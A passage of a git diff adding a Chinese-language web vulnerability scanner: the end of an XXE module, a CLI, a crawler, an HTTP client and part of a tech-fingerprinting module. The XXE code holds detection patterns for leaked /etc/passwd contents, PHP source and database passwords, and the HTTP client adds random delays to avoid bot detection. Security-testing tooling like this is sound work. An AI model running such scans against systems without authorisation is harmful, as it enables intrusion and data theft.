+                # 检查解码后的内容是否包含敏感信息
+                if (re.search(r"root:.*:0:0:", decoded) or 
+                    re.search(r"<\?php", decoded) or 
+                    re.search(r"<!DOCTYPE", decoded) or
+                    re.search(r"<html", decoded)):
+                    return True
+            except:
+                pass
+                
+        return False
+        
+    def _extract_evidence(self, content):
+        """
+        从响应内容中提取XXE漏洞证据
+        
+        Args:
+            content: 响应内容
+            
+        Returns:
+            str: XXE漏洞证据
+        """
+        # 提取敏感信息作为证据
+        evidence = []
+        
+        # 提取/etc/passwd内容
+        passwd_match = re.search(r"(root:.*:0:0:.*?)\n", content)
+        if passwd_match:
+            evidence.append(f"Found /etc/passwd content: {passwd_match.group(1)}")
+            
+        # 提取可能的Base64编码内容
+        base64_pattern = r"([A-Za-z0-9+/]{40,}={0,2})"
+        matches = re.findall(base64_pattern, content)
+        for match in matches:
+            try:
+                decoded = base64.b64decode(match).decode('utf-8', errors='ignore')
+                if re.search(r"root:.*:0:0:", decoded) or re.search(r"<\?php", decoded):
+                    evidence.append(f"Found Base64 encoded sensitive data: {decoded[:100]}...")
+            except:
+                pass
+                
+        # 提取Windows文件内容
+        if re.search(r"\[fonts\]", content) or re.search(r"\[extensions\]", content):
+            evidence.append("Found Windows configuration file content")
+            
+        # 提取配置文件内容
+        if re.search(r"DB_PASSWORD", content) or re.search(r"DB_HOST", content):
+            evidence.append("Found database configuration details")
+            
+        if not evidence:
+            # 如果没有找到特定证据，返回内容摘要
+            return f"Suspicious content found: {content[:200]}..."
+        else:
+            return "\n".join(evidence)
+            
+    def check_callback_server(self):
+        """
+        检查回调服务器是否收到XXE回调
+        
+        Returns:
+            list: 检测到的XXE回调列表
+        """
+        if hasattr(self, 'oob_server') and self.oob_available:
+            return self.oob_server.detected_xxe
+        return []
+        
+    def close(self):
+        """关闭资源"""
+        if hasattr(self, 'oob_server') and self.oob_available:
+            self.oob_server.stop()
+            
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+        
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return True 
\ No newline at end of file
diff --git a/xss_scanner/ui/__pycache__/cli.cpython-313.pyc b/xss_scanner/ui/__pycache__/cli.cpython-313.pyc
new file mode 100644
index 0000000..1ef21f3
Binary files /dev/null and b/xss_scanner/ui/__pycache__/cli.cpython-313.pyc differ
diff --git a/xss_scanner/ui/cli.py b/xss_scanner/ui/cli.py
new file mode 100644
index 0000000..c5e9936
--- /dev/null
+++ b/xss_scanner/ui/cli.py
@@ -0,0 +1,248 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+命令行界面模块，负责显示扫描器的交互界面
+"""
+
+import os
+import sys
+import time
+import logging
+from datetime import datetime
+
+# 定义颜色代码
+COLORS = {
+    'RED': '\033[91m',
+    'GREEN': '\033[92m',
+    'YELLOW': '\033[93m',
+    'BLUE': '\033[94m',
+    'PURPLE': '\033[95m',
+    'CYAN': '\033[96m',
+    'WHITE': '\033[97m',
+    'BOLD': '\033[1m',
+    'UNDERLINE': '\033[4m',
+    'RESET': '\033[0m'
+}
+
+def colored(text, color):
+    """
+    为文本添加颜色
+    
+    Args:
+        text: 文本内容
+        color: 颜色名称
+        
+    Returns:
+        str: 带颜色的文本
+    """
+    if color not in COLORS:
+        return text
+    return f"{COLORS[color]}{text}{COLORS['RESET']}"
+
+def display_banner():
+    """显示扫描器的Banner"""
+    banner = f"""
+{colored('='*80, 'CYAN')}
+{colored('    __  _____ ___     ___                              ', 'CYAN')}
+{colored('    \\ \\/ / __/ __|   / __|__ _ _ _  _ _  ___ _ _      ', 'CYAN')}
+{colored('     >  <\\__ \\__ \\  | (__/ _` | \' \\| \' \\/ -_) \'_|    ', 'CYAN')}
+{colored('    /_/\\_\\___/___/   \\___\\__,_|_||_|_||_\\___|_|       ', 'CYAN')}
+{colored('                                                       ', 'CYAN')}
+{colored('='*80, 'CYAN')}
+{colored('    XSS深度漏洞扫描器 v1.0.0                          ', 'CYAN')}
+{colored('    作者: Lucifrix                           ', 'CYAN')}
+{colored('    支持的漏洞类型: XSS, CSRF, SQL注入, LFI, RFI, SSRF, XXE', 'CYAN')}
+{colored('='*80, 'CYAN')}
+"""
+    print(banner)
+
+def display_progress(current, total, message="正在扫描", width=50):
+    """
+    显示进度条
+    
+    Args:
+        current: 当前进度
+        total: 总进度
+        message: 显示的消息
+        width: 进度条宽度
+    """
+    # 避免除以零
+    if total == 0:
+        total = 1
+        
+    # 计算进度百分比
+    percent = current / total
+    completed = int(width * percent)
+    remaining = width - completed
+    
+    # 构建进度条
+    progress_bar = f"[{colored('#' * completed, 'GREEN')}{' ' * remaining}] {int(percent * 100)}%"
+    
+    # 显示进度条
+    sys.stdout.write(f"\r{message}: {progress_bar}")
+    sys.stdout.flush()
+    
+    # 如果完成，则换行
+    if current == total:
+        sys.stdout.write("\n")
+
+def display_results(results, total_time):
+    """
+    显示扫描结果
+    
+    Args:
+        results: 扫描结果列表
+        total_time: 总耗时
+    """
+    # 合并所有结果的统计信息
+    total_stats = {
+        'pages_scanned': 0,
+        'forms_tested': 0,
+        'parameters_tested': 0,
+        'vulnerabilities_found': 0
+    }
+    
+    all_vulnerabilities = []
+    
+    for result in results:
+        # 更新统计信息
+        for key in total_stats:
+            if key in result['statistics']:
+                total_stats[key] += result['statistics'][key]
+        
+        # 收集所有漏洞
+        all_vulnerabilities.extend(result['vulnerabilities'])
+    
+    # 显示统计信息
+    print(f"\n{colored('='*80, 'CYAN')}")
+    print(f"{colored('扫描统计信息:', 'CYAN')}")
+    print(f"{colored('='*80, 'CYAN')}")
+    print(f"总耗时: {total_time:.2f}秒")
+    print(f"扫描页面数: {total_stats['pages_scanned']}")
+    print(f"测试表单数: {total_stats['forms_tested']}")
+    print(f"测试参数数: {total_stats['parameters_tested']}")
+    print(f"发现漏洞数: {colored(str(total_stats['vulnerabilities_found']), 'RED' if total_stats['vulnerabilities_found'] > 0 else 'GREEN')}")
+    
+    # 如果有漏洞，则显示漏洞详情
+    if all_vulnerabilities:
+        print(f"\n{colored('='*80, 'RED')}")
+        print(f"{colored('漏洞详情:', 'RED')}")
+        print(f"{colored('='*80, 'RED')}")
+        
+        # 按漏洞类型分组
+        vuln_by_type = {}
+        for vuln in all_vulnerabilities:
+            vuln_type = vuln['type']
+            if vuln_type not in vuln_by_type:
+                vuln_by_type[vuln_type] = []
+            vuln_by_type[vuln_type].append(vuln)
+        
+        # 显示各类漏洞详情
+        for vuln_type, vulns in vuln_by_type.items():
+            print(f"\n{colored(f'● {vuln_type} 漏洞 ({len(vulns)}个):', 'YELLOW')}")
+            
+            for i, vuln in enumerate(vulns, 1):
+                print(f"\n  {colored(f'#{i}', 'BOLD')} {colored(vuln['url'], 'UNDERLINE')}")
+                print(f"  - {colored('风险等级:', 'BOLD')} {colored(vuln['severity'], 'RED' if vuln['severity'] == '高' else 'YELLOW' if vuln['severity'] == '中' else 'GREEN')}")
+                print(f"  - {colored('描述:', 'BOLD')} {vuln['description']}")
+                
+                if 'parameter' in vuln:
+                    print(f"  - {colored('参数:', 'BOLD')} {vuln['parameter']}")
+                    
+                if 'payload' in vuln:
+                    print(f"  - {colored('Payload:', 'BOLD')} {vuln['payload']}")
+                    
+                if 'details' in vuln:
+                    print(f"  - {colored('详情:', 'BOLD')} {vuln['details']}")
+                    
+                if 'exploit_result' in vuln:
+                    print(f"  - {colored('利用结果:', 'BOLD')} {vuln['exploit_result']['description']}")
+                    
+                if 'recommendation' in vuln:
+                    print(f"  - {colored('修复建议:', 'BOLD')} {vuln['recommendation']}")
+    else:
+        print(f"\n{colored('='*80, 'GREEN')}")
+        print(f"{colored('恭喜! 未发现漏洞。', 'GREEN')}")
+        print(f"{colored('='*80, 'GREEN')}")
+        
+    print(f"\n{colored('扫描完成!', 'CYAN')}")
+    print(f"{colored('='*80, 'CYAN')}")
+
+def display_vulnerability(vuln):
+    """
+    显示单个漏洞的详细信息
+    
+    Args:
+        vuln: 漏洞信息
+    """
+    print(f"\n{colored('='*80, 'RED')}")
+    print(f"{colored('漏洞详情:', 'RED')}")
+    print(f"{colored('='*80, 'RED')}")
+    
+    print(f"URL: {colored(vuln['url'], 'UNDERLINE')}")
+    print(f"类型: {colored(vuln['type'], 'YELLOW')}")
+    print(f"风险等级: {colored(vuln['severity'], 'RED' if vuln['severity'] == '高' else 'YELLOW' if vuln['severity'] == '中' else 'GREEN')}")
+    print(f"描述: {vuln['description']}")
+    
+    if 'parameter' in vuln:
+        print(f"参数: {vuln['parameter']}")
+        
+    if 'payload' in vuln:
+        print(f"Payload: {vuln['payload']}")
+        
+    if 'details' in vuln:
+        print(f"详情: {vuln['details']}")
+        
+    if 'exploit_result' in vuln:
+        print(f"利用结果: {vuln['exploit_result']['description']}")
+        
+    if 'recommendation' in vuln:
+        print(f"修复建议: {vuln['recommendation']}")
+        
+    print(f"{colored('='*80, 'RED')}")
+
+def prompt_yes_no(message):
+    """
+    提示用户输入是/否
+    
+    Args:
+        message: 提示消息
+        
+    Returns:
+        bool: 用户选择是返回True，否返回False
+    """
+    valid_responses = {
+        'y': True, 'yes': True, '是': True, 
+        'n': False, 'no': False, '否': False
+    }
+    
+    while True:
+        response = input(f"{message} (y/n): ").lower()
+        if response in valid_responses:
+            return valid_responses[response]
+        print("请输入 'y' 或 'n'")
+
+def prompt_input(message, default=None):
+    """
+    提示用户输入
+    
+    Args:
+        message: 提示消息
+        default: 默认值
+        
+    Returns:
+        str: 用户输入
+    """
+    if default:
+        prompt = f"{message} [{default}]: "
+    else:
+        prompt = f"{message}: "
+        
+    response = input(prompt)
+    
+    # 如果用户没有输入，则使用默认值
+    if not response and default is not None:
+        return default
+        
+    return response 
\ No newline at end of file
diff --git a/xss_scanner/utils/__pycache__/crawler.cpython-313.pyc b/xss_scanner/utils/__pycache__/crawler.cpython-313.pyc
new file mode 100644
index 0000000..3991bfb
Binary files /dev/null and b/xss_scanner/utils/__pycache__/crawler.cpython-313.pyc differ
diff --git a/xss_scanner/utils/__pycache__/http_client.cpython-313.pyc b/xss_scanner/utils/__pycache__/http_client.cpython-313.pyc
new file mode 100644
index 0000000..a76ebb8
Binary files /dev/null and b/xss_scanner/utils/__pycache__/http_client.cpython-313.pyc differ
diff --git a/xss_scanner/utils/__pycache__/tech_detector.cpython-313.pyc b/xss_scanner/utils/__pycache__/tech_detector.cpython-313.pyc
new file mode 100644
index 0000000..ada5515
Binary files /dev/null and b/xss_scanner/utils/__pycache__/tech_detector.cpython-313.pyc differ
diff --git a/xss_scanner/utils/__pycache__/validator.cpython-313.pyc b/xss_scanner/utils/__pycache__/validator.cpython-313.pyc
new file mode 100644
index 0000000..64d2464
Binary files /dev/null and b/xss_scanner/utils/__pycache__/validator.cpython-313.pyc differ
diff --git a/xss_scanner/utils/crawler.py b/xss_scanner/utils/crawler.py
new file mode 100644
index 0000000..1dda4c6
--- /dev/null
+++ b/xss_scanner/utils/crawler.py
@@ -0,0 +1,398 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+爬虫模块，负责爬取目标网站的页面
+"""
+
+import re
+import logging
+import threading
+import queue
+import time
+from urllib.parse import urlparse, urljoin, parse_qsl
+from bs4 import BeautifulSoup
+from concurrent.futures import ThreadPoolExecutor
+
+logger = logging.getLogger('xss_scanner')
+
+class Crawler:
+    """爬虫类，负责爬取网站页面"""
+    
+    def __init__(self, http_client, max_depth=2, threads=5, exclude_pattern=None, include_pattern=None):
+        """
+        初始化爬虫
+        
+        Args:
+            http_client: HTTP客户端
+            max_depth: 最大爬取深度
+            threads: 线程数
+            exclude_pattern: 排除URL模式
+            include_pattern: 包含URL模式
+        """
+        self.http_client = http_client
+        self.max_depth = max_depth
+        self.threads = threads
+        self.exclude_pattern = exclude_pattern
+        self.include_pattern = include_pattern
+        
+        # 已访问的URL
+        self.visited_urls = set()
+        
+        # 待访问的URL队列
+        self.url_queue = queue.Queue()
+        
+        # 存储爬取结果
+        self.results = []
+        
+        # 线程锁
+        self.lock = threading.Lock()
+        
+        # 线程池
+        self.thread_pool = None
+        
+        # 记录每个页面的加载状态
+        self.page_status = {}
+        
+        # 常见的静态资源文件扩展名
+        self.static_extensions = {
+            '.css', '.js', '.jpg', '.jpeg', '.png', '.gif', '.svg', '.ico', '.pdf', 
+            '.doc', '.docx', '.xls', '.xlsx', '.ppt', '.pptx', '.zip', '.rar', '.tar', 
+            '.gz', '.mp3', '.mp4', '.avi', '.mov', '.flv', '.wmv'
+        }
+    
+    def crawl(self, base_url):
+        """
+        爬取指定的网站
+        
+        Args:
+            base_url: 基础URL
+            
+        Returns:
+            list: 爬取结果，包含页面信息
+        """
+        logger.info(f"开始爬取网站: {base_url}")
+        
+        # 重置状态
+        self.visited_urls = set()
+        self.url_queue = queue.Queue()
+        self.results = []
+        self.page_status = {}
+        
+        # 解析基础URL
+        parsed_base_url = urlparse(base_url)
+        self.base_domain = parsed_base_url.netloc
+        
+        # 添加基础URL到队列
+        self.url_queue.put((base_url, 0))  # (url, depth)
+        
+        # 创建线程池
+        self.thread_pool = ThreadPoolExecutor(max_workers=self.threads)
+        
+        # 创建并启动爬虫线程
+        workers = []
+        for _ in range(self.threads):
+            worker = threading.Thread(target=self._worker)
+            workers.append(worker)
+            worker.start()
+        
+        # 等待所有线程完成
+        for worker in workers:
+            worker.join()
+        
+        logger.info(f"爬取完成，共发现 {len(self.results)} 个页面")
+        
+        return self.results
+    
+    def _worker(self):
+        """爬虫工作线程"""
+        while True:
+            try:
+                # 获取URL和深度
+                url, depth = self.url_queue.get(block=False)
+                
+                # 处理URL
+                self._process_url(url, depth)
+                
+                # 标记任务完成
+                self.url_queue.task_done()
+            except queue.Empty:
+                # 队列为空，检查是否所有线程都空闲
+                with self.lock:
+                    if self.url_queue.empty():
+                        break
+            except Exception as e:
+                logger.error(f"爬虫线程错误: {str(e)}")
+    
+    def _process_url(self, url, depth):
+        """
+        处理URL
+        
+        Args:
+            url: 要处理的URL
+            depth: 当前深度
+        """
+        # 如果超过最大深度，则跳过
+        if depth > self.max_depth:
+            return
+            
+        # 如果URL已访问，则跳过
+        if url in self.visited_urls:
+            return
+            
+        # 添加到已访问集合
+        with self.lock:
+            self.visited_urls.add(url)
+        
+        # 检查URL是否符合过滤条件
+        if not self._should_crawl(url):
+            return
+            
+        logger.debug(f"爬取页面: {url}")
+        
+        # 发送HTTP请求
+        response = self.http_client.get(url)
+        if not response or response.status_code != 200:
+            logger.debug(f"页面获取失败: {url}, 状态码: {response.status_code if response else 'None'}")
+            return
+            
+        # 解析页面内容
+        content_type = response.headers.get('Content-Type', '')
+        if 'text/html' not in content_type:
+            logger.debug(f"跳过非HTML页面: {url}, Content-Type: {content_type}")
+            return
+            
+        # 解析HTML
+        soup = BeautifulSoup(response.text, 'html.parser')
+        
+        # 提取页面信息
+        page_info = self._extract_page_info(url, soup, response)
+        
+        # 添加到结果
+        with self.lock:
+            self.results.append(page_info)
+        
+        # 如果未达到最大深度，则提取链接
+        if depth < self.max_depth:
+            links = self._extract_links(url, soup)
+            for link in links:
+                # 添加到队列
+                self.url_queue.put((link, depth + 1))
+    
+    def _extract_page_info(self, url, soup, response):
+        """
+        提取页面信息
+        
+        Args:
+            url: 页面URL
+            soup: BeautifulSoup对象
+            response: 响应对象
+            
+        Returns:
+            dict: 页面信息
+        """
+        # 提取页面标题
+        title = soup.title.string if soup.title else "No Title"
+        
+        # 提取表单
+        forms = self._extract_forms(url, soup)
+        
+        # 提取URL参数
+        params = self._extract_params(url)
+        
+        # 提取JavaScript事件
+        events = self._extract_js_events(soup)
+        
+        # 提取HTTP头
+        headers = dict(response.headers)
+        
+        return {
+            'url': url,
+            'title': title,
+            'forms': forms,
+            'params': params,
+            'events': events,
+            'headers': headers,
+            'status_code': response.status_code,
+            'content_length': len(response.content),
+            'cookies': dict(response.cookies)
+        }
+    
+    def _extract_links(self, base_url, soup):
+        """
+        提取页面中的链接
+        
+        Args:
+            base_url: 基础URL
+            soup: BeautifulSoup对象
+            
+        Returns:
+            list: 提取的链接列表
+        """
+        links = []
+        
+        # 提取<a>标签链接
+        for a in soup.find_all('a', href=True):
+            link = a['href'].strip()
+            if link:
+                full_url = urljoin(base_url, link)
+                links.append(full_url)
+        
+        # 提取<form>标签链接
+        for form in soup.find_all('form', action=True):
+            link = form['action'].strip()
+            if link:
+                full_url = urljoin(base_url, link)
+                links.append(full_url)
+        
+        # 过滤链接
+        filtered_links = []
+        for link in links:
+            # 跳过锚点链接
+            if '#' in link:
+                link = link.split('#')[0]
+                if not link:
+                    continue
+            
+            # 跳过JavaScript链接
+            if link.startswith('javascript:'):
+                continue
+                
+            # 跳过邮件链接
+            if link.startswith('mailto:'):
+                continue
+                
+            # 跳过电话链接
+            if link.startswith('tel:'):
+                continue
+                
+            # 跳过静态资源文件
+            parsed_link = urlparse(link)
+            path = parsed_link.path.lower()
+            if any(path.endswith(ext) for ext in self.static_extensions):
+                continue
+                
+            # 只爬取同一域名
+            if parsed_link.netloc and parsed_link.netloc != self.base_domain:
+                continue
+                
+            filtered_links.append(link)
+        
+        return list(set(filtered_links))
+    
+    def _extract_forms(self, base_url, soup):
+        """
+        提取页面中的表单
+        
+        Args:
+            base_url: 基础URL
+            soup: BeautifulSoup对象
+            
+        Returns:
+            list: 表单列表
+        """
+        forms = []
+        
+        for form in soup.find_all('form'):
+            form_info = {
+                'id': form.get('id', ''),
+                'name': form.get('name', ''),
+                'method': form.get('method', 'get').upper(),
+                'action': urljoin(base_url, form.get('action', '')),
+                'fields': []
+            }
+            
+            # 提取表单字段
+            for field in form.find_all(['input', 'textarea', 'select']):
+                # 跳过隐藏字段
+                if field.name == 'input' and field.get('type') == 'hidden':
+                    continue
+                    
+                field_info = {
+                    'name': field.get('name', ''),
+                    'id': field.get('id', ''),
+                    'type': field.get('type', 'text') if field.name == 'input' else field.name,
+                    'value': field.get('value', '')
+                }
+                
+                form_info['fields'].append(field_info)
+                
+            forms.append(form_info)
+            
+        return forms
+    
+    def _extract_params(self, url):
+        """
+        提取URL参数
+        
+        Args:
+            url: URL
+            
+        Returns:
+            list: 参数列表
+        """
+        parsed_url = urlparse(url)
+        params = [p[0] for p in parse_qsl(parsed_url.query)]
+        return params
+    
+    def _extract_js_events(self, soup):
+        """
+        提取JavaScript事件
+        
+        Args:
+            soup: BeautifulSoup对象
+            
+        Returns:
+            list: 事件列表
+        """
+        events = []
+        
+        # 常见的JavaScript事件属性
+        js_events = [
+            'onclick', 'onmouseover', 'onmouseout', 'onload', 'onerror', 'onsubmit',
+            'onchange', 'onkeyup', 'onkeydown', 'onkeypress', 'onblur', 'onfocus',
+            'onreset', 'onselect', 'onabort', 'ondblclick', 'onmousedown', 'onmouseup',
+            'onmousemove', 'onunload'
+        ]
+        
+        # 查找所有带有JavaScript事件的标签
+        for tag in soup.find_all():
+            for event in js_events:
+                if tag.has_attr(event):
+                    events.append({
+                        'tag': tag.name,
+                        'event': event,
+                        'code': tag[event]
+                    })
+                    
+        return events
+    
+    def _should_crawl(self, url):
+        """
+        检查URL是否应该爬取
+        
+        Args:
+            url: URL
+            
+        Returns:
+            bool: 是否应该爬取
+        """
+        # 检查是否是HTTP或HTTPS协议
+        if not url.startswith(('http://', 'https://')):
+            return False
+            
+        # 检查排除模式
+        if self.exclude_pattern and re.search(self.exclude_pattern, url):
+            return False
+            
+        # 检查包含模式
+        if self.include_pattern and not re.search(self.include_pattern, url):
+            return False
+            
+        # 检查是否是静态资源文件
+        parsed_url = urlparse(url)
+        path = parsed_url.path.lower()
+        if any(path.endswith(ext) for ext in self.static_extensions):
+            return False
+            
+        return True 
\ No newline at end of file
diff --git a/xss_scanner/utils/http_client.py b/xss_scanner/utils/http_client.py
new file mode 100644
index 0000000..e2f1f77
--- /dev/null
+++ b/xss_scanner/utils/http_client.py
@@ -0,0 +1,315 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+HTTP客户端模块，负责发送HTTP请求
+"""
+
+import logging
+import requests
+import random
+import time
+from urllib.parse import urlparse, urljoin
+from requests.exceptions import RequestException, Timeout, ConnectionError
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+# 禁用不安全请求的警告
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+logger = logging.getLogger('xss_scanner')
+
+class HttpClient:
+    """HTTP客户端类，负责处理HTTP请求"""
+    
+    def __init__(self, timeout=10, user_agent=None, proxy=None, cookies=None, headers=None, verify_ssl=False):
+        """
+        初始化HTTP客户端
+        
+        Args:
+            timeout: 请求超时时间
+            user_agent: 用户代理
+            proxy: 代理
+            cookies: Cookies
+            headers: 自定义HTTP头
+            verify_ssl: 是否验证SSL证书
+        """
+        self.timeout = timeout
+        self.user_agent = user_agent
+        self.proxy = proxy
+        self.cookies = cookies or {}
+        self.headers = headers or {}
+        self.verify_ssl = verify_ssl
+        self.session = requests.Session()
+        
+        # 设置默认User-Agent
+        if not self.user_agent:
+            self.user_agent = (
+                "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
+                "AppleWebKit/537.36 (KHTML, like Gecko) "
+                "Chrome/91.0.4472.124 Safari/537.36"
+            )
+            
+        # 设置默认请求头
+        if 'User-Agent' not in self.headers:
+            self.headers['User-Agent'] = self.user_agent
+            
+    def get(self, url, params=None, headers=None, cookies=None, allow_redirects=True, timeout=None):
+        """
+        发送GET请求
+        
+        Args:
+            url: 请求的URL
+            params: 请求参数
+            headers: 请求头
+            cookies: Cookies
+            allow_redirects: 是否允许重定向
+            timeout: 超时时间
+            
+        Returns:
+            requests.Response: 响应对象
+        """
+        merged_headers = self._merge_headers(headers)
+        merged_cookies = self._merge_cookies(cookies)
+        timeout = timeout or self.timeout
+        
+        try:
+            response = self.session.get(
+                url=url,
+                params=params,
+                headers=merged_headers,
+                cookies=merged_cookies,
+                proxies=self._get_proxies(),
+                allow_redirects=allow_redirects,
+                timeout=timeout,
+                verify=self.verify_ssl
+            )
+            return response
+        except Timeout:
+            logger.warning(f"请求超时: {url}")
+        except ConnectionError:
+            logger.warning(f"连接错误: {url}")
+        except RequestException as e:
+            logger.warning(f"请求异常: {url} - {str(e)}")
+        except Exception as e:
+            logger.error(f"发送GET请求时发生错误: {url} - {str(e)}")
+            
+        return None
+        
+    def post(self, url, data=None, json=None, headers=None, cookies=None, allow_redirects=True, timeout=None):
+        """
+        发送POST请求
+        
+        Args:
+            url: 请求的URL
+            data: 表单数据
+            json: JSON数据
+            headers: 请求头
+            cookies: Cookies
+            allow_redirects: 是否允许重定向
+            timeout: 超时时间
+            
+        Returns:
+            requests.Response: 响应对象
+        """
+        merged_headers = self._merge_headers(headers)
+        merged_cookies = self._merge_cookies(cookies)
+        timeout = timeout or self.timeout
+        
+        try:
+            response = self.session.post(
+                url=url,
+                data=data,
+                json=json,
+                headers=merged_headers,
+                cookies=merged_cookies,
+                proxies=self._get_proxies(),
+                allow_redirects=allow_redirects,
+                timeout=timeout,
+                verify=self.verify_ssl
+            )
+            return response
+        except Timeout:
+            logger.warning(f"请求超时: {url}")
+        except ConnectionError:
+            logger.warning(f"连接错误: {url}")
+        except RequestException as e:
+            logger.warning(f"请求异常: {url} - {str(e)}")
+        except Exception as e:
+            logger.error(f"发送POST请求时发生错误: {url} - {str(e)}")
+            
+        return None
+        
+    def head(self, url, headers=None, cookies=None, allow_redirects=True, timeout=None):
+        """
+        发送HEAD请求
+        
+        Args:
+            url: 请求的URL
+            headers: 请求头
+            cookies: Cookies
+            allow_redirects: 是否允许重定向
+            timeout: 超时时间
+            
+        Returns:
+            requests.Response: 响应对象
+        """
+        merged_headers = self._merge_headers(headers)
+        merged_cookies = self._merge_cookies(cookies)
+        timeout = timeout or self.timeout
+        
+        try:
+            response = self.session.head(
+                url=url,
+                headers=merged_headers,
+                cookies=merged_cookies,
+                proxies=self._get_proxies(),
+                allow_redirects=allow_redirects,
+                timeout=timeout,
+                verify=self.verify_ssl
+            )
+            return response
+        except Exception as e:
+            logger.error(f"发送HEAD请求时发生错误: {url} - {str(e)}")
+            
+        return None
+        
+    def request(self, method, url, **kwargs):
+        """
+        发送自定义请求
+        
+        Args:
+            method: 请求方法
+            url: 请求的URL
+            **kwargs: 其他参数
+            
+        Returns:
+            requests.Response: 响应对象
+        """
+        # 合并请求头和Cookies
+        if 'headers' in kwargs:
+            kwargs['headers'] = self._merge_headers(kwargs['headers'])
+        else:
+            kwargs['headers'] = self._merge_headers({})
+            
+        if 'cookies' in kwargs:
+            kwargs['cookies'] = self._merge_cookies(kwargs['cookies'])
+        else:
+            kwargs['cookies'] = self._merge_cookies({})
+            
+        # 设置代理
+        kwargs['proxies'] = self._get_proxies()
+        
+        # 设置默认参数
+        kwargs.setdefault('timeout', self.timeout)
+        kwargs.setdefault('verify', self.verify_ssl)
+        
+        try:
+            response = self.session.request(method, url, **kwargs)
+            return response
+        except Exception as e:
+            logger.error(f"发送{method}请求时发生错误: {url} - {str(e)}")
+            
+        return None
+        
+    def download_file(self, url, save_path, chunk_size=8192):
+        """
+        下载文件
+        
+        Args:
+            url: 文件URL
+            save_path: 保存路径
+            chunk_size: 块大小
+            
+        Returns:
+            bool: 下载是否成功
+        """
+        try:
+            response = self.get(url, stream=True)
+            if not response or response.status_code != 200:
+                logger.error(f"下载文件失败, 状态码: {response.status_code if response else 'None'}")
+                return False
+                
+            with open(save_path, 'wb') as f:
+                for chunk in response.iter_content(chunk_size=chunk_size):
+                    if chunk:
+                        f.write(chunk)
+                        
+            return True
+        except Exception as e:
+            logger.error(f"下载文件时发生错误: {url} - {str(e)}")
+            return False
+            
+    def submit_form(self, url, form_data, method='POST', headers=None, cookies=None):
+        """
+        提交表单
+        
+        Args:
+            url: 表单提交URL
+            form_data: 表单数据
+            method: 提交方法
+            headers: 请求头
+            cookies: Cookies
+            
+        Returns:
+            requests.Response: 响应对象
+        """
+        if method.upper() == 'POST':
+            return self.post(url, data=form_data, headers=headers, cookies=cookies)
+        else:
+            return self.get(url, params=form_data, headers=headers, cookies=cookies)
+            
+    def _merge_headers(self, headers=None):
+        """
+        合并请求头
+        
+        Args:
+            headers: 请求头
+            
+        Returns:
+            dict: 合并后的请求头
+        """
+        merged = self.headers.copy()
+        if headers:
+            merged.update(headers)
+        return merged
+        
+    def _merge_cookies(self, cookies=None):
+        """
+        合并Cookies
+        
+        Args:
+            cookies: Cookies
+            
+        Returns:
+            dict: 合并后的Cookies
+        """
+        merged = self.cookies.copy()
+        if cookies:
+            merged.update(cookies)
+        return merged
+        
+    def _get_proxies(self):
+        """
+        获取代理配置
+        
+        Returns:
+            dict: 代理配置
+        """
+        if not self.proxy:
+            return {}
+            
+        return {
+            'http': self.proxy,
+            'https': self.proxy
+        }
+        
+    def delay_request(self, min_delay=1, max_delay=3):
+        """
+        延迟请求以避免被目标网站检测为爬虫
+        
+        Args:
+            min_delay: 最小延迟时间(秒)
+            max_delay: 最大延迟时间(秒)
+        """
+        delay = random.uniform(min_delay, max_delay)
+        time.sleep(delay) 
\ No newline at end of file
diff --git a/xss_scanner/utils/tech_detector.py b/xss_scanner/utils/tech_detector.py
new file mode 100644
index 0000000..d35d723
--- /dev/null
+++ b/xss_scanner/utils/tech_detector.py
@@ -0,0 +1,384 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+技术检测模块，用于识别网页使用的技术、框架和编程语言
+"""
+
+import re
+import logging
+import json
+from urllib.parse import urlparse
+from bs4 import BeautifulSoup
+
+logger = logging.getLogger('xss_scanner')
+
+class TechDetector:
+    """网站技术检测类，用于识别网站使用的技术栈"""
+    
+    def __init__(self):
+        """初始化技术检测器"""
+        # 前端框架特征
+        self.frontend_frameworks = {
+            'React': [
+                ('script', {'src': re.compile(r'react(-|\.min\.)?\.js')}),
+                ('script', {'src': re.compile(r'react-dom(-|\.min\.)?\.js')}),
+                ('meta', {'name': 'generator', 'content': re.compile(r'react', re.I)}),
+                ('div', {'id': 'root'}),
+                ('div', {'id': 'app'}),
+                ('meta', {'name': 'next-head-count'}),
+                ('code', {'id': '__NEXT_DATA__'})
+            ],
+            'Vue.js': [
+                ('script', {'src': re.compile(r'vue(-|\.min\.)?\.js')}),
+                ('div', {'id': 'app'}),
+                ('div', {'id': 'vue-app'}),
+                ('div', {'class': 'v-application'}),
+                ('meta', {'name': 'generator', 'content': re.compile(r'vue', re.I)})
+            ],
+            'Angular': [
+                ('script', {'src': re.compile(r'angular(-|\.min\.)?\.js')}),
+                ('*', {'ng-app': re.compile(r'.*')}),
+                ('*', {'ng-controller': re.compile(r'.*')}),
+                ('*', {'ng-repeat': re.compile(r'.*')}),
+                ('*', {'ng-bind': re.compile(r'.*')}),
+                ('*', {'ng-model': re.compile(r'.*')})
+            ],
+            'jQuery': [
+                ('script', {'src': re.compile(r'jquery(-|\.min\.)?\.js')}),
+            ],
+            'Bootstrap': [
+                ('link', {'href': re.compile(r'bootstrap(-|\.min\.)?\.css')}),
+                ('script', {'src': re.compile(r'bootstrap(-|\.min\.)?\.js')}),
+                ('div', {'class': re.compile(r'container(-fluid)?')}),
+                ('div', {'class': re.compile(r'row')}),
+                ('div', {'class': re.compile(r'col(-[a-z]+-[0-9]+)?')})
+            ]
+        }
+        
+        # 后端框架和语言特征
+        self.backend_technologies = {
+            'PHP': [
+                ('X-Powered-By', re.compile(r'PHP/?', re.I)),
+                ('Set-Cookie', re.compile(r'PHPSESSID', re.I)),
+                ('link', {'href': re.compile(r'\.php')}),
+                ('a', {'href': re.compile(r'\.php')}),
+                ('form', {'action': re.compile(r'\.php')})
+            ],
+            'WordPress': [
+                ('meta', {'name': 'generator', 'content': re.compile(r'WordPress', re.I)}),
+                ('link', {'href': re.compile(r'wp-content')}),
